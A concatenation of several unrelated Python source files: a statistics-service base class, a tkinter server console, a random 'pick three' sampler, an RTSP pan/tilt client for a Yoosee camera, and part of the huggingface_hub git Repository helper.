if TYPE_CHECKING:
# pylint: disable=ungrouped-imports,cyclic-import
from bxcommon.connections.abstract_node import AbstractNode
@dataclass
class StatsIntervalData:
start_time: datetime = dataclasses.field(default_factory=datetime.utcnow)
end_time: Optional[datetime] = None
_closed: bool = False
def close(self):
self.end_time = datetime.utcnow()
self._closed = True
T = TypeVar("T", bound=StatsIntervalData)
N = TypeVar("N", bound="AbstractNode")
class StatisticsService(Generic[T, N], metaclass=ABCMeta):
"""
Abstract class of statistics services.
"""
history: Deque[T]
node: Optional[N]
name: str
log_level: LogLevel
logger: CustomLogger
interval_data: T
interval: int
reset: bool
def __init__(
self,
name: str,
interval: int = 0,
look_back: int = 1,
reset: bool = False,
stat_logger: CustomLogger = logger,
log_level: LogLevel = LogLevel.STATS,
):
self.history = deque(maxlen=look_back)
self.node = None
self.name = name
self.log_level = log_level
self.logger = stat_logger
self.interval_data = self.get_interval_data_class()()
self.interval = interval
self.reset = reset
@abstractmethod
def get_interval_data_class(self) -> Type[T]:
pass
@abstractmethod
def get_info(self) -> Optional[Dict[str, Any]]:
"""
Constructs response object to be outputted on stat service set interval.
:return: dictionary to be converted to JSON
"""
def set_node(self, node: N) -> None:
self.node = node
# reset the interval data
self.create_interval_data_object()
def create_interval_data_object(self) -> None:
self.interval_data = self.get_interval_data_class()()
def close_interval_data(self) -> None:
assert self.node is not None
assert self.interval_data is not None
self.interval_data.close()
self.history.append(self.interval_data)
# pylint: disable=unused-argument
def flush_info(self, threshold: int = 0) -> int:
self.close_interval_data()
data = self.get_info()
if data:
self.logger.log(self.log_level, {"data": data, "type": self.name})
# Start a new interval data if non cumulative
if self.reset:
self.create_interval_data_object()
return self.interval
class ThreadedStatisticsService(StatisticsService[T, N], metaclass=ABCMeta):
"""
Abstract class for stats service that may take a long time to execute.
"""
_thread: Optional[Thread]
_alive: bool
_lock: Lock
def __init__(self, name: str, *args, **kwargs) -> None:
super(ThreadedStatisticsService, self).__init__(name, *args, **kwargs)
self._thread = None
self._alive = True
self._lock = Lock()
def start_recording(self, record_fn: Callable) -> None:
self._thread = Thread(target=self.loop_record_on_thread, args=(record_fn,))
# pyre-fixme[16]: `Optional` has no attribute `start`.
self._thread.start()
def stop_recording(self) -> None:
# TODO: This is necessary in order to make the tests pass. We are initializing multiple
# nodes in a process in a test, both of which are initializing the memory_statistics_service.
# Thus, there is unclear ownership of the global variable. The right fix here is to make
# memory_statistics_service not a singleton anymore and have it be a variable that is assigned
# on a per-node basis.
if self._thread is None:
self.logger.error(log_messages.STOP_RECORDING_CALLED_ON_UNINITIALIZED_THREAD)
return
with self._lock:
self._alive = False
# pyre-fixme[16]: `Optional` has no attribute `join`.
self._thread.join()
def sleep_and_check_alive(self, sleep_time: float) -> bool:
"""
Sleeps for sleep_time seconds and checks whether or this service is alive every 30 seconds.
Returns whether or not this service is alive at the end of this sleep time.
"""
with self._lock:
alive = self._alive
while sleep_time > 0 and alive:
time.sleep(constants.THREADED_STATS_SLEEP_INTERVAL_S)
sleep_time -= constants.THREADED_STATS_SLEEP_INTERVAL_S
with self._lock:
alive = self._alive
time.sleep(0) # ensure sleep is called regardless of the sleep time value
return alive
def loop_record_on_thread(self, record_fn: Callable) -> None:
"""
Assume that record_fn is a read-only function and its okay to get somewhat stale data.
"""
node = self.node
assert node is not None
# align all nodes to write statistics at the same time (clock interval)
next_clock_interval = ((int(time.time() / self.interval) + 1) * self.interval) - time.time()
alive = self.sleep_and_check_alive(next_clock_interval)
while alive:
start_date_time = datetime.utcnow()
start_time = time.time()
try:
record_fn()
# pylint: disable=broad-except
except Exception as e:
self.logger.error(
log_messages.FAILURE_RECORDING_STATS, self.name, e, traceback.format_exc()
)
else:
runtime = time.time() - start_time
task_duration_logger.statistics(
{
"type": "TaskDuration",
"start_date_time": start_date_time,
"task": self.name,
"duration": runtime,
"node_id": node.opts.node_id,
}
)
# align all nodes to write statistics at the same time (clock interval)
next_clock_sleep_time = ((int(time.time() / self.interval) + 1) * self.interval) - time.time()
alive = self.sleep_and_check_alive(next_clock_sleep_time)
|
servercmds.py
|
import tkinter as tk
import multiprocessing as mp
import threading
class ServerCommandLineUI:
def __init__(self, command_handler, pipe, frame = None, default_title = 'Server Command Line'):
self.command_handler = command_handler
self.pipe = pipe
self.frame = frame
self.default_title = default_title
self.quit = False
self.process_interface, process_interface = mp.Pipe()
mp.Process(target = _UI, args = [process_interface, None], name = 'Server command line UI process').start()
threading.Thread(target = self._receiver, name = 'Server UI comm receiver').start()
threading.Thread(target = self._server_receiver, name = 'Server UI server receiver').start()
self.set_title('Server Command Line')
def _server_receiver(self):
while not self.quit:
input_data = self.pipe.recv()
self.process_interface.send(['push', input_data])
def _receiver(self):
command = ''
while (not command == 'quit') and (not self.quit):
input_data = self.process_interface.recv()
command = input_data[0]
args = input_data[1:]
if command == 'cmdout':
self.process_interface.send(['push', self.command_handler(args[0])])
self.quit = True
def set_title(self, title):
self.process_interface.send(['set title', title])
class _UI:
def __init__(self, process_interface, frame):
self.process_interface = process_interface
self.quit = False
if frame is None:
self.toplevel = tk.Tk()
else:
self.toplevel = frame
threading.Thread(target = self.receiver, name = 'Server UI process receiver').start()
## make ui
#command output box
self.output_frame = tk.Frame(self.toplevel)
self.output_listbox = tk.Listbox(self.output_frame, font = self.styling.fonts.small)
self.output_bar = tk.Scrollbar(self.output_frame, command = self.output_listbox.yview)
self.output_listbox.config(yscrollcommand = self.output_bar.set)
self.output_bar.pack(side = tk.RIGHT, fill = tk.Y)
self.output_listbox.pack(side = tk.LEFT, fill = tk.BOTH, expand = True)
#command entry field
self.cmd_var = tk.StringVar()
self.cmd_field = tk.Entry(self.toplevel, textvariable = self.cmd_var, font = self.styling.fonts.small)
self.cmd_button = tk.Button(self.toplevel, text = 'Submit', command = self.submit_command, font = self.styling.fonts.small, relief = self.styling.relief, overrelief = self.styling.overrelief)
if type(self.toplevel) == tk.Tk:
self.toplevel.bind('<Return>', self.submit_command)
else:
self.cmd_button.bind('<Return>', self.submit_command)
#grid items
self.output_frame.grid(column = 0, row = 0, columnspan = 2, sticky = 'NESW')
self.cmd_field.grid(column = 0, row = 1, sticky = 'NESW')
self.cmd_button.grid(column = 1, row = 1, sticky = 'NESW')
#set grid weights
self.toplevel.columnconfigure(0, weight = 1)
self.toplevel.rowconfigure(0, weight = 1)
## end of make ui
if self.toplevel is not None:
self.toplevel.geometry('400x300')
self.toplevel.mainloop()
self.on_quit()
def receiver(self):
while not self.quit:
input_data = self.process_interface.recv()
command = input_data[0]
args = input_data[1:]
if command == 'set title':
if type(self.toplevel) is tk.Tk:
self.toplevel.title(args[0])
elif command == 'quit':
self.on_quit()
elif command == 'push':
if type(args[0]) == str:
args[0] = args[0].split('\n')
for line in args[0]:
for line0 in line.split('\n'):
if line0.startswith('$$') and line0.endswith('$$') and len(line0) > 4: #console output operation
if line0[2:len(line0) - 2] == 'clear':
self.output_listbox.delete(0, tk.END)
elif line0[2:len(line0) - 2] == 'close_window':
self.on_quit()
else:
self.output_listbox.insert(tk.END, line0)
self.output_listbox.see(tk.END)
def on_quit(self):
self.quit = True
self.handle_command('sv_quit', display = False)
self.process_interface.send(['quit'])
self.process_interface.close()
if type(self.toplevel) is tk.Tk:
self.toplevel.destroy()
def submit_command(self, event = None):
self.handle_command(self.cmd_var.get())
self.cmd_var.set('')
def handle_command(self, cmd, display = True):
if display:
self.output_listbox.insert(tk.END, '] {}'.format(cmd))
self.process_interface.send(['cmdout', cmd])
class styling:
class fonts:
typeface = 'Courier New'
small = (typeface, 10)
medium = (typeface, 15)
large = (typeface, 25)
relief = tk.FLAT
overrelief = tk.GROOVE
|
pick_three.py
|
"""
This simple program generates random 3-value sets,
and assumes that the order of the values in the set
are not important.
2 graphs are displayed:
The first graph shows a plotting of all possible
sets that could exist.
The second graph shows the output of function
randomly_sample.
The graphs simply serve as a method to check the
that the functions' outputs are random, as a
distribution of numbers chosen randomly should
be uniform in shape.
This is not a frequency distribution, which would
in theory be more practical, however a standard
plotting of the chosen set will demonstrate the
concept just fine.
This program also outputs to stdout 1 set chosen
at random from the universe of all possible sets
that could exist.
The sets all have a shared property: they are
comprised of int values 0 - 9.
"""
import multiprocessing
from itertools import combinations_with_replacement
from random import choices
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
SAMPLE = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
universe = []
setSize = 3
picks = []
random_universe = []
def generate_universe(set_size, sampleList):
return list(combinations_with_replacement(sampleList, set_size))
def randomly_sample(universe, num_of_samples):
return choices(universe, k=num_of_samples)
def generate_graph(universe, grph_title, fig_num):
fig = plt.figure(fig_num)
fig.suptitle(grph_title)
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('pick 1')
ax.set_ylabel('pick 2')
ax.set_zlabel('pick 3')
for tupleSet in universe:
x = tupleSet[0]
y = tupleSet[1]
z = tupleSet[2]
ax.scatter(x, y, z,)
plt.show()
def main():
universe = generate_universe(setSize, SAMPLE)
picks = randomly_sample(universe, 1)
random_universe = randomly_sample(universe, 10000)
p0 = multiprocessing.Process(target=generate_graph, args=(universe, "All possible sets", 1))
p1 = multiprocessing.Process(target=generate_graph, args=(random_universe, "Randomly chosen sets", 2))
p0.start()
p1.start()
print(picks)
if __name__ == '__main__':
main()
|
yoosee.py
|
import socket
import time
from threading import Thread
class Yoosee():
def __init__(self, host):
self.host = host
self.port = 554
self.connected = False
self.ticks = None
self.client = None
def ptz(self, cmd):
cmd = cmd.upper()
if ['UP', 'DOWN', 'LEFT', 'RIGHT'].count(cmd) != 1:
return
# 上下翻转,符合操作逻辑
if cmd == 'UP':
cmd = 'DOWN'
elif cmd == 'DOWN':
cmd = 'UP'
# 协议命令为DWON,所以要转一下,不知道为啥
if cmd == 'DOWN':
cmd = 'DWON'
# 5秒重置
if(self.ticks is not None and int(time.time()) - self.ticks > 3) and self.connected == True:
self.connected = False
t = Thread(target=self.move, args=(cmd,))
t.start()
# 发送数据
def send(self, data):
try:
if self.client is not None:
self.client.send(data.encode())
except Exception as ex:
print(ex)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(30)
client.connect((self.host, self.port))
self.client = client
# 初始数据
init_data = "SETUP rtsp://" + self.host + "/onvif1/track1 RTSP/1.0\r\n" + \
"CSeq: 1\r\n" + \
"User-Agent: LibVLC/2.2.6 (LIVE555 Streaming Media v2016.02.22)\r\n" + \
"Transport: RTP/AVP/TCP;unicast;interleaved=0-1\r\n\r\n"
client.send(init_data.encode())
time.sleep(2)
client.send(data.encode())
def move(self, ptzCmd):
if self.connected:
print('正在操作中')
return
self.connected = True
print('Connected', self.host, ptzCmd)
self.ticks = int(time.time())
# 发送PTZ命令
self.send("SET_PARAMETER rtsp://" + self.host + "/onvif1 RTSP/1.0\r\n" + \
"Content-type: ptzCmd: " + ptzCmd + "\r\n" + \
"CSeq: 2\r\n" + \
"Session: 12345678\r\n\r\n")
# client.close()
print("我已经退出了,后会无期")
self.connected = False
|
repository.py
|
import atexit
import os
import re
import subprocess
import tempfile
import threading
import time
from contextlib import contextmanager
from pathlib import Path
from typing import Callable, Dict, Iterator, List, Optional, Tuple, Union
from urllib.parse import urlparse
from tqdm.auto import tqdm
from huggingface_hub.constants import REPO_TYPES_URL_PREFIXES, REPOCARD_NAME
from huggingface_hub.repocard import metadata_load, metadata_save
from requests.exceptions import HTTPError
from .hf_api import HfApi, HfFolder, repo_type_and_id_from_hf_id
from .lfs import LFS_MULTIPART_UPLOAD_COMMAND
from .utils import logging, run_subprocess
logger = logging.get_logger(__name__)
class CommandInProgress:
"""
Utility to follow commands launched asynchronously.
"""
def __init__(
self,
title: str,
is_done_method: Callable,
status_method: Callable,
process: subprocess.Popen,
post_method: Optional[Callable] = None,
):
self.title = title
self._is_done = is_done_method
self._status = status_method
self._process = process
self._stderr = ""
self._stdout = ""
self._post_method = post_method
@property
def is_done(self) -> bool:
"""
Whether the process is done.
"""
result = self._is_done()
if result and self._post_method is not None:
self._post_method()
self._post_method = None
return result
@property
def status(self) -> int:
"""
The exit code/status of the current action. Will return `0` if the
command has completed successfully, and a number between 1 and 255 if
the process errored-out.
Will return -1 if the command is still ongoing.
"""
return self._status()
@property
def failed(self) -> bool:
"""
Whether the process errored-out.
"""
return self.status > 0
@property
def stderr(self) -> str:
"""
The current output message on the standard error.
"""
self._stderr += self._process.stderr.read()
return self._stderr
@property
def stdout(self) -> str:
"""
The current output message on the standard output.
"""
self._stdout += self._process.stdout.read()
return self._stdout
def __repr__(self):
status = self.status
if status == -1:
status = "running"
return (
f"[{self.title} command, status code: {status},"
f" {'in progress.' if not self.is_done else 'finished.'} PID:"
f" {self._process.pid}]"
)
def is_git_repo(folder: Union[str, Path]) -> bool:
"""
Check if the folder is the root or part of a git repository
Args:
folder (`str`):
The folder in which to run the command.
Returns:
`bool`: `True` if the repository is part of a repository, `False`
otherwise.
"""
folder_exists = os.path.exists(os.path.join(folder, ".git"))
git_branch = subprocess.run(
"git branch".split(), cwd=folder, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
return folder_exists and git_branch.returncode == 0
def is_local_clone(folder: Union[str, Path], remote_url: str) -> bool:
"""
Check if the folder is a local clone of the remote_url
Args:
folder (`str` or `Path`):
The folder in which to run the command.
remote_url (`str`):
The url of a git repository.
Returns:
`bool`: `True` if the repository is a local clone of the remote
repository specified, `False` otherwise.
"""
if not is_git_repo(folder):
return False
remotes = run_subprocess("git remote -v".split(), folder).stdout
# Remove token for the test with remotes.
remote_url = re.sub(r"https://.*@", "https://", remote_url)
remotes = [re.sub(r"https://.*@", "https://", remote) for remote in remotes.split()]
return remote_url in remotes
def is_tracked_with_lfs(filename: Union[str, Path]) -> bool:
"""
Check if the file passed is tracked with git-lfs.
Args:
filename (`str` or `Path`):
The filename to check.
Returns:
`bool`: `True` if the file passed is tracked with git-lfs, `False`
otherwise.
"""
folder = Path(filename).parent
filename = Path(filename).name
try:
p = run_subprocess("git check-attr -a".split() + [filename], folder)
attributes = p.stdout.strip()
except subprocess.CalledProcessError as exc:
if not is_git_repo(folder):
return False
else:
raise OSError(exc.stderr)
if len(attributes) == 0:
return False
found_lfs_tag = {"diff": False, "merge": False, "filter": False}
for attribute in attributes.split("\n"):
for tag in found_lfs_tag.keys():
if tag in attribute and "lfs" in attribute:
found_lfs_tag[tag] = True
return all(found_lfs_tag.values())
def is_git_ignored(filename: Union[str, Path]) -> bool:
"""
Check if file is git-ignored. Supports nested .gitignore files.
Args:
filename (`str` or `Path`):
The filename to check.
Returns:
`bool`: `True` if the file passed is ignored by `git`, `False`
otherwise.
"""
folder = Path(filename).parent
filename = Path(filename).name
try:
p = run_subprocess("git check-ignore".split() + [filename], folder, check=False)
# Will return exit code 1 if not gitignored
is_ignored = not bool(p.returncode)
except subprocess.CalledProcessError as exc:
raise OSError(exc.stderr)
return is_ignored
def is_binary_file(filename: Union[str, Path]) -> bool:
"""
Check if file is a binary file.
Args:
filename (`str` or `Path`):
The filename to check.
Returns:
`bool`: `True` if the file passed is a binary file, `False` otherwise.
"""
try:
with open(filename, "rb") as f:
content = f.read(10 * (1024**2)) # Read a maximum of 10MB
# Code sample taken from the following stack overflow thread
# https://stackoverflow.com/questions/898669/how-can-i-detect-if-a-file-is-binary-non-text-in-python/7392391#7392391
text_chars = bytearray(
{7, 8, 9, 10, 12, 13, 27} | set(range(0x20, 0x100)) - {0x7F}
)
return bool(content.translate(None, text_chars))
except UnicodeDecodeError:
return True
def files_to_be_staged(pattern: str, folder: Union[str, Path]) -> List[str]:
"""
Returns a list of filenames that are to be staged.
Args:
pattern (`str` or `Path`):
The pattern of filenames to check. Put `.` to get all files.
folder (`str` or `Path`):
The folder in which to run the command.
Returns:
`List[str]`: List of files that are to be staged.
"""
try:
p = run_subprocess("git ls-files -mo".split() + [pattern], folder)
if len(p.stdout.strip()):
files = p.stdout.strip().split("\n")
else:
files = []
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return files
def is_tracked_upstream(folder: Union[str, Path]) -> bool:
"""
Check if the current checked-out branch is tracked upstream.
Args:
folder (`str` or `Path`):
The folder in which to run the command.
Returns:
`bool`: `True` if the current checked-out branch is tracked upstream,
`False` otherwise.
"""
try:
run_subprocess(
"git rev-parse --symbolic-full-name --abbrev-ref @{u}".split(), folder
)
return True
except subprocess.CalledProcessError as exc:
if "HEAD" in exc.stderr:
raise OSError("No branch checked out")
return False
def commits_to_push(folder: Union[str, Path], upstream: Optional[str] = None) -> int:
"""
Check the number of commits that would be pushed upstream
Args:
folder (`str` or `Path`):
The folder in which to run the command.
upstream (`str`, *optional*):
The name of the upstream repository with which the comparison should be
made.
Returns:
`int`: Number of commits that would be pushed upstream were a `git
push` to proceed.
"""
try:
result = run_subprocess(f"git cherry -v {upstream or ''}".split(), folder)
return len(result.stdout.split("\n")) - 1
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
@contextmanager
def _lfs_log_progress():
"""
This is a context manager that will log the Git LFS progress of cleaning,
smudging, pulling and pushing.
"""
if logger.getEffectiveLevel() >= logging.ERROR:
try:
yield
finally:
return
def output_progress(stopping_event: threading.Event):
"""
To be launched as a separate thread with an event meaning it should stop
the tail.
"""
pbars = {}
def close_pbars():
for pbar in pbars.values():
pbar["bar"].update(pbar["bar"].total - pbar["past_bytes"])
pbar["bar"].refresh()
pbar["bar"].close()
def tail_file(filename) -> Iterator[str]:
"""
Creates a generator to be iterated through, which will return each
line one by one. Will stop tailing the file if the stopping_event is
set.
"""
with open(filename, "r") as file:
current_line = ""
while True:
if stopping_event.is_set():
close_pbars()
break
line_bit = file.readline()
if line_bit is not None and not len(line_bit.strip()) == 0:
current_line += line_bit
if current_line.endswith("\n"):
yield current_line
current_line = ""
else:
time.sleep(1)
# If the file isn't created yet, wait for a few seconds before trying again.
# Can be interrupted with the stopping_event.
while not os.path.exists(os.environ["GIT_LFS_PROGRESS"]):
if stopping_event.is_set():
close_pbars()
return
time.sleep(2)
for line in tail_file(os.environ["GIT_LFS_PROGRESS"]):
state, file_progress, byte_progress, filename = line.split()
description = f"{state.capitalize()} file {filename}"
current_bytes, total_bytes = byte_progress.split("/")
current_bytes = int(current_bytes)
total_bytes = int(total_bytes)
if pbars.get((state, filename)) is None:
pbars[(state, filename)] = {
"bar": tqdm(
desc=description,
initial=current_bytes,
total=total_bytes,
unit="B",
unit_scale=True,
unit_divisor=1024,
),
"past_bytes": current_bytes,
}
else:
past_bytes = pbars[(state, filename)]["past_bytes"]
pbars[(state, filename)]["bar"].update(current_bytes - past_bytes)
pbars[(state, filename)]["past_bytes"] = current_bytes
current_lfs_progress_value = os.environ.get("GIT_LFS_PROGRESS", "")
with tempfile.TemporaryDirectory() as tmpdir:
os.environ["GIT_LFS_PROGRESS"] = os.path.join(tmpdir, "lfs_progress")
logger.debug(f"Following progress in {os.environ['GIT_LFS_PROGRESS']}")
exit_event = threading.Event()
x = threading.Thread(target=output_progress, args=(exit_event,), daemon=True)
x.start()
try:
yield
finally:
exit_event.set()
x.join()
os.environ["GIT_LFS_PROGRESS"] = current_lfs_progress_value
class Repository:
"""
Helper class to wrap the git and git-lfs commands.
The aim is to facilitate interacting with huggingface.co hosted model or
dataset repos, though not a lot here (if any) is actually specific to
huggingface.co.
"""
command_queue: List[CommandInProgress]
def __init__(
self,
local_dir: str,
clone_from: Optional[str] = None,
repo_type: Optional[str] = None,
use_auth_token: Union[bool, str] = True,
git_user: Optional[str] = None,
git_email: Optional[str] = None,
revision: Optional[str] = None,
private: bool = False,
skip_lfs_files: bool = False,
client: Optional[HfApi] = None,
):
"""
Instantiate a local clone of a git repo.
If specifying a `clone_from`, it will clone an existing remote
repository, for instance one that was previously created using
`HfApi().create_repo(repo_id=repo_name)`.
`Repository` uses the local git credentials by default, but if required,
the `huggingface_token` as well as the git `user` and the `email` can be
explicitly specified.
Args:
local_dir (`str`):
path (e.g. `'my_trained_model/'`) to the local directory, where
the `Repository` will be initalized.
clone_from (`str`, *optional*):
repository url (e.g.
`'https://huggingface.co/philschmid/playground-tests'`).
repo_type (`str`, *optional*):
To set when creating a repo: et to "dataset" or "space" if
creating a dataset or space, default is model.
use_auth_token (`str` or `bool`, *optional*, defaults to `True`):
huggingface_token can be extract from `HfApi().login(username,
password)` and is used to authenticate against the hub (useful
from Google Colab for instance).
git_user (`str`, *optional*):
will override the `git config user.name` for committing and
pushing files to the hub.
git_email (`str`, *optional*):
will override the `git config user.email` for committing and
pushing files to the hub.
revision (`str`, *optional*):
Revision to checkout after initializing the repository. If the
revision doesn't exist, a branch will be created with that
revision name from the default branch's current HEAD.
private (`bool`, *optional*, defaults to `False`):
whether the repository is private or not.
skip_lfs_files (`bool`, *optional*, defaults to `False`):
whether to skip git-LFS files or not.
client (`HfApi`, *optional*):
Instance of HfApi to use when calling the HF Hub API. A new
instance will be created if this is left to `None`.
"""
os.makedirs(local_dir, exist_ok=True)
self.local_dir = os.path.join(os.getcwd(), local_dir)
self.repo_type = repo_type
self.command_queue = []
self.private = private
self.skip_lfs_files = skip_lfs_files
self.client = client if client is not None else HfApi()
self.check_git_versions()
if isinstance(use_auth_token, str):
self.huggingface_token = use_auth_token
elif use_auth_token:
self.huggingface_token = HfFolder.get_token()
else:
self.huggingface_token = None
if clone_from is not None:
self.clone_from(repo_url=clone_from)
else:
if is_git_repo(self.local_dir):
logger.debug("[Repository] is a valid git repo")
else:
raise ValueError(
"If not specifying `clone_from`, you need to pass Repository a"
" valid git clone."
)
if self.huggingface_token is not None and (
git_email is None or git_user is None
):
user = self.client.whoami(self.huggingface_token)
if git_email is None:
git_email = user["email"]
if git_user is None:
git_user = user["fullname"]
if git_user is not None or git_email is not None:
self.git_config_username_and_email(git_user, git_email)
self.lfs_enable_largefiles()
self.git_credential_helper_store()
if revision is not None:
self.git_checkout(revision, create_branch_ok=True)
# This ensures that all commands exit before exiting the Python runtime.
# This will ensure all pushes register on the hub, even if other errors happen in subsequent operations.
atexit.register(self.wait_for_commands)
@property
def current_branch(self) -> str:
"""
Returns the current checked out branch.
Returns:
`str`: Current checked out branch.
"""
try:
result = run_subprocess(
"git rev-parse --abbrev-ref HEAD".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return result
def check_git_versions(self):
"""
Checks that `git` and `git-lfs` can be run.
Raises:
`EnvironmentError`: if `git` or `git-lfs` are not installed.
"""
try:
git_version = run_subprocess(
"git --version".split(), self.local_dir
).stdout.strip()
except FileNotFoundError:
raise EnvironmentError(
"Looks like you do not have git installed, please install."
)
try:
lfs_version = run_subprocess(
"git-lfs --version".split(), self.local_dir
).stdout.strip()
except FileNotFoundError:
raise EnvironmentError(
"Looks like you do not have git-lfs installed, please install."
" You can install from https://git-lfs.github.com/."
" Then run `git lfs install` (you only have to do this once)."
)
logger.info(git_version + "\n" + lfs_version)
def clone_from(self, repo_url: str, use_auth_token: Union[bool, str, None] = None):
"""
Clone from a remote. If the folder already exists, will try to clone the
repository within it.
If this folder is a git repository with linked history, will try to
update the repository.
Args:
repo_url (`str`):
The URL from which to clone the repository
use_auth_token (`Union[str, bool]`, *optional*):
Whether to use the authentication token. It can be:
- a string which is the token itself
- `False`, which would not use the authentication token
- `True`, which would fetch the authentication token from the
local folder and use it (you should be logged in for this to
work).
- `None`, which would retrieve the value of
`self.huggingface_token`.
Raises:
`ValueError`: if the `token` cannot be identified and the `private`
keyword is set to `True`. The `token`
must be passed in order to handle private repositories.
Raises:
`EnvironmentError`: if you are trying to clone the repository in a
non-empty folder, or if the `git`
operations raise errors.
"""
token = use_auth_token if use_auth_token is not None else self.huggingface_token
if token is None and self.private:
raise ValueError(
"Couldn't load Hugging Face Authorization Token. Credentials are"
" required to work with private repositories. Please login in using"
" `huggingface-cli login` or provide your token manually with the"
" `use_auth_token` key."
)
hub_url = self.client.endpoint
if hub_url in repo_url or (
"http" not in repo_url and len(repo_url.split("/")) <= 2
):
repo_type, namespace, repo_id = repo_type_and_id_from_hf_id(
repo_url, hub_url=hub_url
)
if repo_type is not None:
self.repo_type = repo_type
repo_url = hub_url + "/"
if self.repo_type in REPO_TYPES_URL_PREFIXES:
repo_url += REPO_TYPES_URL_PREFIXES[self.repo_type]
if token is not None:
whoami_info = self.client.whoami(token)
user = whoami_info["name"]
valid_organisations = [org["name"] for org in whoami_info["orgs"]]
if namespace is not None:
repo_id = f"{namespace}/{repo_id}"
repo_url += repo_id
scheme = urlparse(repo_url).scheme
repo_url = repo_url.replace(f"{scheme}://", f"{scheme}://user:{token}@")
if namespace == user or namespace in valid_organisations:
try:
_ = HfApi().repo_info(
f"{repo_id}", repo_type=self.repo_type, token=token
)
except HTTPError:
if self.repo_type == "space":
raise ValueError(
"Creating a Space through passing Space link to"
" clone_from is not allowed. Make sure the Space exists"
" on Hugging Face Hub."
)
else:
self.client.create_repo(
repo_id=repo_id,
token=token,
repo_type=self.repo_type,
exist_ok=True,
private=self.private,
)
else:
if namespace is not None:
repo_url += f"{namespace}/"
repo_url += repo_id
# For error messages, it's cleaner to show the repo url without the token.
clean_repo_url = re.sub(r"(https?)://.*@", r"\1://", repo_url)
try:
run_subprocess("git lfs install".split(), self.local_dir)
# checks if repository is initialized in a empty repository or in one with files
if len(os.listdir(self.local_dir)) == 0:
logger.warning(f"Cloning {clean_repo_url} into local empty directory.")
with _lfs_log_progress():
env = os.environ.copy()
if self.skip_lfs_files:
env.update({"GIT_LFS_SKIP_SMUDGE": "1"})
run_subprocess(
f"{'git clone' if self.skip_lfs_files else 'git lfs clone'} {repo_url} ."
.split(),
self.local_dir,
env=env,
)
else:
# Check if the folder is the root of a git repository
in_repository = is_git_repo(self.local_dir)
if in_repository:
if is_local_clone(self.local_dir, repo_url):
logger.warning(
f"{self.local_dir} is already a clone of {clean_repo_url}."
" Make sure you pull the latest changes with"
" `repo.git_pull()`."
)
else:
output = run_subprocess(
"git remote get-url origin".split(),
self.local_dir,
check=False,
)
error_msg = (
f"Tried to clone {clean_repo_url} in an unrelated git"
" repository.\nIf you believe this is an error, please add"
f" a remote with the following URL: {clean_repo_url}."
)
if output.returncode == 0:
clean_local_remote_url = re.sub(
r"https://.*@", "https://", output.stdout
)
error_msg += (
"\nLocal path has its origin defined as:"
f" {clean_local_remote_url}"
)
raise EnvironmentError(error_msg)
if not in_repository:
raise EnvironmentError(
"Tried to clone a repository in a non-empty folder that isn't a"
" git repository. If you really want to do this, do it"
" manually:\ngit init && git remote add origin && git pull"
" origin main\n or clone repo to a new folder and move your"
" existing files there afterwards."
)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_config_username_and_email(
self, git_user: Optional[str] = None, git_email: Optional[str] = None
):
"""
Sets git username and email (only in the current repo).
Args:
git_user (`str`, *optional*):
The username to register through `git`.
git_email (`str`, *optional*):
The email to register through `git`.
"""
try:
if git_user is not None:
run_subprocess(
"git config user.name".split() + [git_user], self.local_dir
)
if git_email is not None:
run_subprocess(
f"git config user.email {git_email}".split(), self.local_dir
)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_credential_helper_store(self):
"""
Sets the git credential helper to `store`
"""
try:
run_subprocess("git config credential.helper store".split(), self.local_dir)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_head_hash(self) -> str:
"""
Get commit sha on top of HEAD.
Returns:
`str`: The current checked out commit SHA.
"""
try:
p = run_subprocess("git rev-parse HEAD".split(), self.local_dir)
return p.stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_remote_url(self) -> str:
"""
Get URL to origin remote.
Returns:
`str`: The URL of the `origin` remote.
"""
try:
p = run_subprocess(
"git config --get remote.origin.url".split(), self.local_dir
)
url = p.stdout.strip()
# Strip basic auth info.
return re.sub(r"https://.*@", "https://", url)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_head_commit_url(self) -> str:
"""
Get URL to last commit on HEAD. We assume it's been pushed, and the url
scheme is the same one as for GitHub or HuggingFace.
Returns:
`str`: The URL to the current checked-out commit.
"""
sha = self.git_head_hash()
url = self.git_remote_url()
if url.endswith("/"):
url = url[:-1]
return f"{url}/commit/{sha}"
def list_deleted_files(self) -> List[str]:
"""
Returns a list of the files that are deleted in the working directory or
index.
Returns:
`List[str]`: A list of files that have been deleted in the working
directory or index.
"""
try:
git_status = run_subprocess(
"git status -s".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
if len(git_status) == 0:
return []
# Receives a status like the following
# D .gitignore
# D new_file.json
# AD new_file1.json
# ?? new_file2.json
# ?? new_file4.json
# Strip each line of whitespaces
modified_files_statuses = [status.strip() for status in git_status.split("\n")]
# Only keep files that are deleted using the D prefix
deleted_files_statuses = [
status for status in modified_files_statuses if "D" in status.split()[0]
]
# Remove the D prefix and strip to keep only the relevant filename
deleted_files = [
status.split()[-1].strip() for status in deleted_files_statuses
]
return deleted_files
def lfs_track(
self, patterns: Union[str, List[str]], filename: Optional[bool] = False
):
"""
Tell git-lfs to track files according to a pattern.
Setting the `filename` argument to `True` will treat the arguments as
literal filenames, not as patterns. Any special glob characters in the
filename will be escaped when writing to the `.gitattributes` file.
Args:
patterns (`Union[str, List[str]]`):
The pattern, or list of patterns, to track with git-lfs.
filename (`bool`, *optional*, defaults to `False`):
Whether to use the patterns as literal filenames.
"""
if isinstance(patterns, str):
patterns = [patterns]
try:
for pattern in patterns:
cmd = f"git lfs track {'--filename' if filename else ''}".split()
cmd.append(pattern)
run_subprocess(cmd, self.local_dir)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
